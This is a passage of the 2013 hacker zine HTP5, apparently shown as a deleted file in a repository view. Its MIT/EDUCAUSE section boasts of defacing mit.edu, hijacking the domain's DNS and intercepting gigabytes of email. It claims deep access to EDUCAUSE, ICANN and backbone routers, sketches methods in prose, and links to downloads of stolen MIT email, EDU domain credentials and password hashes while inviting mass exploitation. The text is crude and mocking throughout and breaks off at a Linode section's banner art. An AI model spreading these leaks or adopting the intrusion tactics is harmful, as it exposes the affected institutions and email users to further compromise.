|▒█▄▄▄▄▄▄█ |▒█▄▄▄▄▄▄█ |/▒▒▒▒▒▒▒/ |▒█▄▄▄▄▄█
|/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒▒/ |/▒▒▒▒▒▒/ ░ ░░▒ ZINE 5
htphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtphtpht
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
NORTH KOREA OF THE INTERNET SINCE 2011
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
So its been 182 days since our last zine, since then our dedicated team
of researchers, philanthropists, playboys and troublemakers have been
busy at work scouring the Internet for high quality entertainment at the
expense of everybody who isn't us.
5/1 also marks the day HTP was founded, which means we've had two
glorious years of being the best and owning the rest. Today we will be
drinking 40s, listening to some balla tunes, and circlejerking over the
inevitable confusion, awe, bitterness and jokes that will ensue from
this release. :)
Due to the immense size of HTP5, this zine is unfortunately not self
extracting. However do not fret, this zine is full HD and 4D ready.
We've divided everything into its own section just to keep things sane.
So go get the popcorn ready and strap in for a long and wild ride. This
zine is a tale of trust, betrayal, brotherhood, rampant paranoia,
hilariously shoddy police work (More on that later), and the plight of
the whitehat sheep being fleeced at will by their blackhat shepherds.
It's really only missing a tacked on love story, a few good car chases,
and an explosion at the end, but it might not be too late for all of that.
▀ ▄
█▄▄
▄____ ░ █▄
▄ ▄███▀▀ \;',`'-,▓█░
▓██▀-;_,; ':-;_,'.█▓░
▓▓██; '/ , _`.-\█▓
░▓███▄'`. (` /` ` \`|█
░ ▓▓▓ █|██ `\`-. \_ / |▓
░█▓▓█▓░░ | █▓ ( `, .`\ ;'|░
░▓▓█░ ░░ \ ░ ▓░░ .' `-'/▀
▄▄▓▓▄▄▄▄▄▄▄▄▄▄▄▄▓▄▄▓▓▓░ .'▀
░██▓▀ ▀█████████████████▄.-'`
███░ ███▀▀███▀▀███ ███
█████████ ███ ███▄▄███ 2013 ▒ ░
█████████ ███ ██████▀
███ ███ ███ ███
▄███▄ ▄███▄ ███ ▄███▄
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

285
htp/HTP5/0x01_MIT-EDUCAUSE.txt
View file

@ -1,285 +0,0 @@
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
░████▓██▓██▓▒▒▒░
░▒██████▓▓███████▒████▒░░░░
░▓████████████████▒██▓████▒▒░░ ░░ ░░░░
░▒▓████████████████████████▓▓██▒█▓▒▓▒▒▓█░░ ░░
▒████████████████████████████████▓▓▓██████▓ ▒ ░░
█▓▓███████████████████████████████████████▓▓▓ ░ ░ ░▒
░▓▓█▓███████████████████████████████████████████░ ▒ ░ ▒░
▒▓▓▓▓▓▓▓█████████████████████████████████████████▓▓░░▒ ░
░▒▓▓▒▓▓██████████████████████████████████████████████▓▒ ░░ ░ ░
░▒▒▒▓▓▓▓▓▓▓▓▓▓▓███████████████████████████████████████▓▓█▒ ░ ░░
░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████▓▓▓▒ ▒░
░▒█▓█▓█▓▓▓▓▓▓█▓▓▓▓▓▓█████████████████████████████████████████▒█ ▒░
░▓▓▓▓▓▓▓▒█▓▒▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████░█▓ ░ ▒
░██▓▓▓▓█▓▓▓▓█▒▓▓▓▓▓▓▓▓▓▓▓██████▓████████████████████████████████▓██▓█░░
▒▓█▓▓▓▓▓█▓█▓▒░▒░█▓▓▓▓▓▓▓▓▓▓██████████████████████████████████████▓███▓▒▒
▒█▓▓▓▓▒▓█░░▓▓▓░██▒▓▓▓▓▓▓▓▓▓▓▓████▓██████████████████████████████████▓██▓▓
▓▓▓██▓▒▓▓▓█▒░▓▒▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓████████████████████████████████████████████
█▓█▓▓▒▓▒▓▓▓▒░▒▓▓▓▓░░▓▒▓▓▓▓▓▓▓▓█████████████████████████████████████████▓▓▓
░▓▓▓▓▒▓▒▓█▓▓▒░░▓▓▓▓▓▒▒▓▓▒▓▓▓▓▓███▓▓████████████████████████████████████████
░▒░█░▒▒░▒▓▓▓▒▒░░░▓█▓▓▓▒▓▓▒▒▒▓▓▓██▓▓████████████████████████████████████████
░░ ░ ░ ░▒▓▒▒▒▒░▒░▓▓▓▓▓▓▓▒▓▓▒▒▓█████████████████████████████████████████████
▒▓░ ░░░░▒▓▓░▒░▒▓░░░▒▓▓▓▓▓▓▓▓▓▓██████████████████████████████████████████████
██▒▒░░▒░▒▓▓░▒▒▒▒▒░░▒▒▓▓▓▓▓▓▒▓█▓█████████████████████████████████████████████
██▓▒▒▒▒░▒▒▓░██▒▓▓▒▒▒░▓▓▓▒▒▓▓████████████████████████████████████████████████
████▓▓▓▓░▓▓░▓▓█▓▓▒▒▒░░▒█▒▒▓█████████████████████████████████████████████████
█▓█▓▒▓██░█▓░▒▓█▓▓▓▒▒▒▒▒██▓██████████████████████████████████████████████████
▓█▒░░▓▒▒▓▓▒░░░▒▒▒▓▓▓█▓██████████████████████████████████████████████████████
▒█▒░ ▓ ░▒▒░ ░ ░░░░▒░░▒▓█▓█████████████████████████████████████████████████
░█▒░ ░ ░░░░▒█▓███████████████████████████▓▒░▒▒▒▓█████████████
░░ ░░░░░░▒█████████████████████████▓▒▓▓▓▓▓▓▓▒▓███████████
░ ░░░░░░░░░▓███████████████████████▒▓██▓▒░░▒▒▒▒██████████
░ ░░░░░░░░░░░▓▓████████████████████████▓▒░░░░▒░░▓█████████
░ ░░░░▒▓▓▒░░░░░░░░░░░░▒░█████████████████████▓▓▓░ ░░░▒░▒█████████
░░░░ ░▒▓▒ ░▒▒▓▓▒░░░░░░░░▓▒███████████████████████▓██▒▒░░▒░▓████████
░░ ░██▓▓▓▒░░ ░░░░░░░░░░░░░░░▒▓▓██████████████████████▓▓▒▒░░▒░██████▓▓▓
░ ░▒▒▓▓▓░▒░░░▒▒░░░░░░ ░ ░░░░▒█████████████████████▓▓▓▒░░░▒▒██▓██▓▓▓▓
░ ░▒▒▒░ ░░▒▒░░ ░░░░░▓███████████████████▓██▓█▒░▒░███▓█▓▓▓▓▓
░░░░░ ░▒▒░░ ░░░░░░▒████████████████████▓▓▒▒▒░▓▓████▓▓▓██
░░░ ░▒▒░░ ░░░░░░▒▒▓█████████████████▓▓▓▓▒░▓███████▓▓▓█
░░ ░░░░░▒▒▒▒▒██████████████▓▓▓▓▒▒▒▓██████▓▓▓▓▓▓
░░ ░░░░░░▒▒▒▒▒▓█████████████▓▓▓▓▒▒▓██▓██████▓██▓
░░ ░░░░░░▒▒▒▒▒▒▒██████▓██▓██▓▓▓▓▓▓▓▓▓▓▓▓███▓█▓▓▓▓
░░░ ░░░░░░▒▒▒▒▒▒▒▒▒█████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓███▓▓█▓▓▓▓
░░ ░░░░░░░▒▒░▒▒▒▒▒▒▓████▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓███▓▓▓
░ ░░░░░ ░░░░░░▒░▒▒▒▒░▒▒▒▒▒▓███▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓
░░ ░▒░░░░░ ░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓█▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██▓▓▓▓█▓
░░░░░ ░░▒▒░ ░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓█▓▓▓▓▓▓▓▓▓▓▓▓▓███▓▓▓█▓▓
░▓▒▒▒▒▒▓░ ░░░░░░░░░░░░░░▒░▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██▓▓▓▒░░
▒░░░ ░░░░░░░░░░░░░░░░░░▒░░▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒▒░░
░ ░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓█▓▓▓▒▒░░
░ ░░░░░░░░░░░░░░░░░▒░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓░░
░░░░░░░░░░░░ ░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓█▓▓▓▒
░▒▒▒▒▒▒▒▓▓▒░ ░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▒░
░▒▒ ░░░ ░░░░░░░░░░░░░░░▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▒▒▒▓▓▓▓▓▓▓▓▓▓▒░░
░ ░░░░░ ░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓░░
░▒▒▓▓▒░░ ░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒░░░▒▒▓▓▓▓▓▓█▓▓▓▓▒
░░░▒▒░░░ ░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒░░░░░░▒▒▓▓▓▓▓▓▓▓█▒▒░
░ ░░░▒▒▒░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒░░░░░░░░░▒▒▓▓▓▓▓▓▓▓▓▒░
░ ░░▒▒▒▒▒▒▒▒▒▒░▒▒▒▒▒▒▓▓▓▒░░░░░░░░░░▒▒▓▓▓▓▓▓▓▓▓▓░
░ ░░▒▒▒▒▒▒▒▒▒▒░░░░▒▓▓▓▓▒▒░░░░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓░
░ ░░░▒▒▒▒▒▒▒▒▒░ ░▒▓▓▓▓▒▒░░░░░░░░░░░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▒▒
░░ ░▒▒▒▒▒▒▒▒░░ ░▒▓▒▒░░░░░░░░░░░░░░▒▒▒▒▒▒▓▓▓▓▓▓█▓▒▓
░░░▒▒▒▒▒░░░ ░▒▒░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▒███
░ ░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▓▓▒█▓███
░ ░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒███████
░ ░░░░░░░░░░░░░░░░▒▒▒▒░▒▓▒▒▒▓▓▒
░ ░░░░░░░░░░░░░░▒░▒█▓▒▓▓▒▒▒▒
░ ░░░░░░░░░░▒░░▓▒▓▓▓▓▓▒▒▒▒
░ ░░░░░░░▒▒▓█▓██▓▓▓▓▒▓
░ ░▒▒▓▓▓▓▓█▓▓▓▓▓▓▓
▒ ░▒▓▓▓▓▓█▓▓▓▓▓▓▓▒▒
▒▒██ ░░▒▒██▓▒▒▒▒▒▒▒▒▓▓▒▒▒
░▒█▓██▒ ░░▒▓▓▓▓▒▒▓▓▒▓▒▒▒░░░░░
▓███▓██ ░░░▓▒▒▒▒▓▒░▒▓▓▓▓▓▓▓████
░░█████▓▒ ▒▓▓▓░░░░▒▒▓██▒░░░░▓▒▒▒░░░░▓▓▓
░▒▓▒██▒▓░ ░░░░▒░░░░░▒▓▓▓█▒▒░░░▒▓▒▒▒▒░░░░▒▒▒
░█████▒█░░░░░░░░░▒ ░▓██▓▒▒░░░▒▓█▓▓▒▒░░░░░░░░
░ ███▒███▓░░░░░░░░▒░░▓█▓▓░░░░░▒▓▓▓▓▒░░░░░░░▒▓▓
▓█▒█████░░░░░░░░▓░ ███▒░░░░░░░▓▓▒▒░░░░▒▒░▒▒░░
░▒█████▒░░░░░░░▒▒▓▒█▓▒▒░░ ░▒▒▒▒▒▒▒▒▒░░░▒▒▒▓▓▒▒
▒▓██████░░░░░░░▓▒░▓█░░▒▓▒░░░░▒▒▓▓▒░▒░░░░▒▓▒▒▓█▓
███████░░░░░░░░▒▓░▒░▒▓▒░▒░░░▒▒▒▒▓▒▒░ ░░░░░▒▓▓░░
███████░░░░░ ░░░▒▒█░░░░░▒░░▒▒▒▒░▒▓▒░░░░░░░░ ▓░▒▒
▒▒█████░░░░░ ░░░░▒█▓▒ ░▒▒▒▒░▒▒▓░░░▓▓▒░░░░░▒░▒░░░░
▒▒█▒█▒▓░░░░░░░░░░▒██▒██░░░██▒░▒░▒▒▒▒▒░░░░▒▒▓▒▒█▒██
░█▒████░░░░░░░░░░░▓█▒████░░▒▒█▒░░▒▒▒▒▒▒▒▒░░▒░░░▒█▒░
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
"What's the score?"
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
██ ██ ██ ██ █████ HTP5
██ ██ ██ ▄▄ ▄▄
██ ▀▀ ██ ██ ██ FEATURING EDUCAUSE
▄██▄▄▄▄██▄▄██▄▄██▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
Back in January we decided to upstage Anonymous (again) and have a little fun
with MIT. After their circa 2000 deface on mit.edu, we decided to up the ante.
In doing so, we knew we had to make it very clear that it was an anti-Anonymous
deface (A mirror of it can be found here: straylig.ht/files/mit/mit.html). Thus
why it made reference to Sabu, grand wizard of LulzSec, and "DOWN WITH
ANONYMOUS." Despite all this, some of the cluebags in the media apparently
thought that by "DOWN WITH ANONYMOUS," we meant "we b down wit da lol anonimuss
leejun y0!" Additionally, almost everybody missed the fact that it was a troll
deface, which just proves that it will be a few decades before we reach October
1st, 1993.
MIT's reaction was particularly lulzy. They did a better job of reporting the
facts than all the media outlets, but they couldn't decide whether the e-mail
got intercepted or not. First, there was this from
http://tech.mit.edu/V132/N62/hack.html:
"Unlike previous attacks, which temporarily disabled some services, this attack
had the potential to be much more severe. A more calculated hacker could have
intercepted email messages intended for anyone at the MIT.edu domain, including
all alumni who use alum.mit.edu email addresses."
After having a day to do a better post-mortem, MIT started freaking out. They
published this: http://tech.mit.edu/V132/N63/hack.html. From that link:
"Unlike previous attacks, which temporarily disabled some services, this attack
had the potential to be much more severe. Email was specifically affected. Mail
is normally received by one of nine different MIT servers; however today, mail
that was sent between 11:58 a.m. and 1:05 p.m. was directed to a machine at
KAIST, Korea Advanced Institute of Science and Technology, meaning the
attackers had complete control of emails successfully sent during that time."
We don't know the percentage either, but we know 5.1 GB of uncompressed e-mail
when we see it :P. So who owned the domain? Well :
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
Domain Name: MIT.EDU
Registrant:
Massachusetts Institute of Technology
Cambridge, MA 02139
UNITED STATES
Administrative Contact:
I got owned
Massachusetts Institute of Technology
MIT Room W92-167, 77 Massachusetts Avenue
Cambridge, MA 02139-4307
UNITED STATES
(617) 324-1337
cunt@mit.edu
Technical Contact:
OWNED NETWORK OPERATIONS
ROOT
US
DESTROYED, MA 02139-4307
UNITED STATES
(617) 253-1337
owned@mit.edu
Name Servers:
FRED.NS.CLOUDFLARE.COM
KATE.NS.CLOUDFLARE.COM
Domain record activated: 23-May-1985
Domain record last updated: 22-Jan-2013
Domain expires: 31-Jul-2013
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
Here's the cherry on top:
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
From: "CloudFlare Support" <support@cloudflare.com>
Subject: [CloudFlare Support] Pending request: Why is cloudflare staff
modifying my dns records? (ticket #12053)
Date: Wed, January 23, 2013 4:48 pm
To: "Fuckmit" <fuckmit@tormail.org>
##- Please type your reply above this line -##
[CloudFlare Support] Pending request: Why is cloudflare staff modifying my dns
records? (ticket #12053)
This is an email to remind you that your request (#12053) is pending and awaits
your feedback.
Please click the link below to review and update your request:
http://support.cloudflare.com/tickets/12053
----------------------------------------------
Justin, Jan 22 11:48 am (PST)
Hi,
We have reason to believe you are not the actual owner of the mit.edu domain.
We have been in contact with the actual owner this morning.
As such we have taken steps to secure the account, and the domain has already
been returned to the actual owner.
----------------------------------------------
Fuckmit, Jan 22 11:45 am (PST)
Two questions:
Why is cloudflare staff modifying my dns records without authorization?
Why is cloudflare staff repeatedly regenerating my API key every time they
decide to modify my dns records without authorization?
--------------------------------
This email is a service from CloudFlare Support
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
You have reason to believe a user named 'Fuckmit' is not the legitimate owner
of mit.edu? Excellent deduction, Justin.
Soon after, we decided to troll Gizmodo and the rest of the media into
preserving our access. The 'browser exploit' on MIT's NOC
( http://gizmodo.com/5978039/hackers-incoherently-deface-entire-mit-website )
never existed. We'd never show our full hand at once, we'd just lose access.
MIT certainly believed us though, despite their own reassurances otherwise. For
confirmation, they contacted the root registrar for EDU domains (EDUCAUSE)
after finally asserting that we got access to their EDUCAUSE account.
EDUCAUSE then made the fatal mistake of overlooking our complete access into
the EDU TLD. Though, we can't say we expect much from a registrar running ASPX
on their backend.
Now, just in case you don't believe us, we have entrusted the login credentials
of nearly every EDU domain to hackers worldwide (active as we speak) within the
MIT section of this zine. So, let's see what happens first, mass exploitation
or whitehat response? ;) We are not ones for defacing, actually, and we're
going to leave that up to the Internet Justice League (AKA Anonymous) if they
can even get to it on time. And we figure they'll manifest some statement
about how its morally justifiable to deface *.edu. We frankly don't care.
By the end of today (5/6), EDU operation should return to normal.
Moreover, we particularly enjoyed the fact that the first nameserver for
root-servers.org is an EDU domain. This effectively gave us control over
root-servers.org. However, ICANN is responsible for the root zones file.
ICANN was already compromised by that time, though, joined by several of the
major RIR's (RIPE, LACNIC, etc.) along with bgp+shell access and 13,000+
backbone AS's (some of which persists to this day) & the InterNIC. Surprisingly,
they used passwordless private keys stored on their servers to ssh into the
internal Juniper routers as superusers: only 3 networks away and not even phys
sep. Nothing proxychains can't handle. They probably should've checked their
netscreens before it was too late. :P
None of this access was ever used, but we did get to see some pretty funny
shit. In the backbone of SourceForge (Savvis), for example, we ran into some
old SunOS Sparc boxes with 1900+ day uptime. They had passwordless private key
auth, and the kernels were fairly ancient (and in the absence of all file
transfer utils, `whois` coupled with a few pipes worked great to transfer tgz's
served from port 43 - no file editing required). As it turns out, we were not
the first ones there. On their Phoenix, AZ stats server, some random hacker was
kicking back in /var/tmp/.access_logx/ with a psyBNC connected to Undernet. On
SourceForge's backbone -- LOL? We don't think he fully realized what he had
breached. Or maybe he just really needed a psyBNC server. Either way, he'll
probably have to end up getting a new psyBNC after today. On Github or
something.
Enjoy the MIT emails/EDUCAUSE login data, included in this segment of
HTP5:
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/mit.zip
|- 2.6GB | Zip compressed MIT emails
~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/EDUDOMAINS.rpt
|- 28MB | EDUCAUSE database: extracted domain credentials
~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/EDUCAUSE-MISCDBS.zip
|- 12MB | EDUCAUSE misc. databases extracted from 6.4GB MSSQL tape backup
~ http://mirror.hack-the-planet.tv/HTP-5/MIT-EDUCAUSE/eduhashindex.txt
|- 143K | EDUCAUSE domain passwords, allow account/DNS modification.
| | For use with /HTP-5/MIT-EDUCAUSE/EDUDOMAINS.rpt
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

133
htp/HTP5/0x02_Linode.txt
View file

@ -1,133 +0,0 @@
▄▄ ▀▄▄▒▒▒▒▒▒▒▒▒▒▒▒▒░ ░▒▒▒▒▒▒▒▒▒░░ ▒▒▒▒▒▒▒▒▒▒▒▒░ ▒▒▒▒▒▒▒▒▒▒░ ░░░░░ ░░ ░ ░░
▒▒█▄▄ ▀▀▄▄ ░ ▒▒▒▒▒▒░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒▒▒▒▒ ░░░░░░░░░░░ ░░░░ ░░░░
▓▒▒▒▒██▄▄ ▀▄▄ ▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒ ░░░░░░░░ ░░░░░░░░░░ ░
▓▓███▓▓▒███▄░▀▄▄ ▒▒▒▒▒▒▒▒▒▒▒▒ ░░░░░░ ░░░░░▄▄▄▄▀▀
▓▓█████████▓▒▄▄ ▀▀▀▄▄▄▒▒▒▒ ░░░░░░ ░ ░░░▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀▀░▒▒▒▓
▒▒▓▓██████████▓▓▓▒▄▄ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▄▄▄▄▄▄▀▀▀▀▀▀▀ ▒▒▒▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▓▓▓█████
▒▒▒▓▓█████████▓▀▀▀▀▀▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▒▒▒▄▄▄▄▄▄▄▄▄▀▀▀▀▀▀▀▀▀▀▀▀▒▒▒▒▒▒▒▒░░░▒███▓▓████
▒▒▒▓██████████▒░░░░░░▒▒▒▒▒█████████████▓ ▒▒▒▒▒▒▒░░░ ░░░░░░░▒▒▓▓▓▓▓▓▒▒░░▒███▓████
▒▒▒▓▓█▓▒▒▒▀▀▀▀▀▀▄▄▄▄▄▄▄▄▒████████████████▒▀▀▀▀▀▄▄▄▄▀▀▀▀▀▀▒▓███████▒░▓██▒░▒█▓▓███
▒▒▒▓████████▓▒░░░░░░░██▒█████████████████▓░▒▒▒▒▒▒▒▒▒▒▒▒░▓████████▒ ▓███▒░░▒███▓
▒▒░▒██▒▓██████ ░░░░░░▓██████████████████▒░▒░░░░░░░░▒░▒████████ ▒████▓░░▓▓▓▓▒
░▒░░▓█░░▒▒▓██▓ ░░░░ ░███████████████████▒░ ▄ ▄▄ ▄░░███████▓ ░ ▓██████▓░▓▒▒▒░
░░░░▒█░░░░▒▓▓░░ ░░ ▒██████████████████▒▀▀▀▀▀░░▀▀▀▀▄██████▒ ░ ▓███████▒ ▓░
░ ░█▒ ░░▒▒░░ ░░░▒█████████████▓▓█▒▀░░░░░░░░░░░▀▒████▓ ▓██████▓░░ ▓
░░ █▒ ▒▒ ░░░░▓█████████▒▒▒░░░░░░░░ ░░░░░░░▒███▒▒▒███████▓ ░ ▓
░░░ ▓▒ ▒ ░▒ ░░ ░░▀▀▓▓▓▓▒░░░░░░░░░░ ░░ ░░░ ▒▓▓▓▓▓███▓▒▒ ░░ ▓
░ ▓▒ ▒▒ ▒▒░ ░░░░░░░░░░░░░░░░░ ░░ ░ ▒▓
░ ░░▓ ░░ ░▒░░ ░░ ░░░░░░ ░░░ ░░░░░ ░ ░▒ ▒
░░ ▓ ░░▒▒░░ ░░ ░░░░░ ░░░░ ░▒ ▓
░▓ ░▒▒░░ ░░░ ░░ ░░░ ░░ ░ ▒ ▒░
▓▒ ░░▒▒░░░ ░░░░░░░ ▀▀▀▄▒▒░░░░▒▄▀▀ ░ ▒ ▒
▒▓░░░░░░▒▒▒░░░░ ░░░░░░░ ░░░▒▒▓▒▒▒▒▓▓▓▓▓▒░░ ░▒ ▓
▒▓ ░░ ░▒▒░░░░░ ░░░▒▒▒▒▒▒▒▓▓█▓▒▒▒▒▒▒▒▒▒▓█▓▓▓▒░ ░▒ █░
▓░ ░▒▓▒░░░░░ ░░░▒▒▓▓▒▒▒▒▒▒▒░░ ░ ░░░▒▒▒██▒░ ░░▒░▒▒
▒▓ ░▒▓▓▒▒░░░░ ░░▒▒▒▒▒░░░░ ░░░░░░░░░ ░░ ░▒▓█▒ ░▒▒░▓
▒▓ ░ ▒▒▒▒▒░░░ ░░▒▒▒▒▒░░░░░░░░░▒▒▒▒▒▒░░░░░░░▒▒▒▒ ░▒▒▒▒▒
▒▒ ░ ▒▒▒░░░░ ░░▒▒░░░░▄▄▄▄▀▀▀▀▀▓▓█▀▀▀▄▄▄▄▒▓░░▒░ ░░▒▒░▒
▒▓ ░ ▒▒▒▒▒▒░░ ░▒▒░░░░ ░░░░ ░ ░░░ ░▒▒ ░░▒▒░ ▒
▒▒ ░ ▒▒▒▓▒▒░░ ░▒░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒░░ ░░░░▒▒▒▒▒▒░░ ▒
▓▒░▒░░ ░▒▒▓▓▒▒░░ ░▒░░░░░░░░░▒░▒▒▒▒▒▒▒▒░░░░░░░▒▒▓██▓▒ ░▒
░▒▓▓▒▒▒▒▒ ░▒▒▓▓▓▒▒░░░░░▒▓▒░ ░░░░▒░▒▒▓▓▒▒▒▒▒░░░░▒▒▓████▒ ░▒▒░
░▒▒▒▓▓▒▒▒▓▒░ ░▒▓▓▓▓▓▒▒░░░▒▒▓▒▒▒░░░▒▒░▒▒▓▓▓▓▒▒▒▒░▒▒▒▓████▓░ ░▒▒░░
░▒▒▓▒▒▒▓▓▓▓▓▓▒ ░ ▒▒▓▓▓▓▓▒▒▒▓▓▒▓▒▒▒▒▒░▒▒▒▓▓████▓▓▓▓▓▒▓████▓▒░ ░▒▒▒░░░░░
░▒▒▓▒▒░░▒▒█▓▓▓▓▒ ░░ ░▒▒▓███▓▓▓▓▓█▓▒▒▒▒▒▒▒▓▓▓▓███▓▓████████▒▒ ░▒▒▒▒▒░░░░░░
░▒▒▒▒ ▒▒▓█▒▒▓▒░ ░ ░ ░▒▒██████████▓▓▓▒▒▓████████████████▒▒ ░ ░▒▒▒▒▒▒░ ░░░
▒▒▒▒░ ▒▒▒▒▓▒▓▓▒░ ░ ░░▒▓▓█████████▓▓▓▓███████████████▓▒░ ░▒▒▒▒▒▒░
▒▒░ ▒▒▒▒▒█▓▓▒▒ ░░▒▒▒██████████████████████████▓▒▒ ▒▒▒▒▒▒▒░░
▒ ░░░▒▒▒▓██▒▒▒ ░ ░ ░▒▒▒▓█████████████████████▓▒▒░ ░ ▒▒▒▒▒▒░░░ ░
░ ░ ░░░░▒▒▒▒▓█▒▒░░░ ░░░▒▒██████████████████▓▓▒▒░ ░ ░▒▒▒▒░░░░░ ░░
░ ░ ░░░ ▒▒▒▒▒▒▓▓▒░░ ░ ░▒▒▓███▓▓▓█████▓▓▓▓▓▒▒░ ░░▒▒▒░░░░░ ░░░░
░ ░░░░░░ ░▒▒▒▒▒▒▒▓▒ ░ ░▒▒▓▓▓▒▒▓▓▓▓▒▒▒▒▓▒▒░ ░░░▒▒▒▒░░░░ ░░░░░
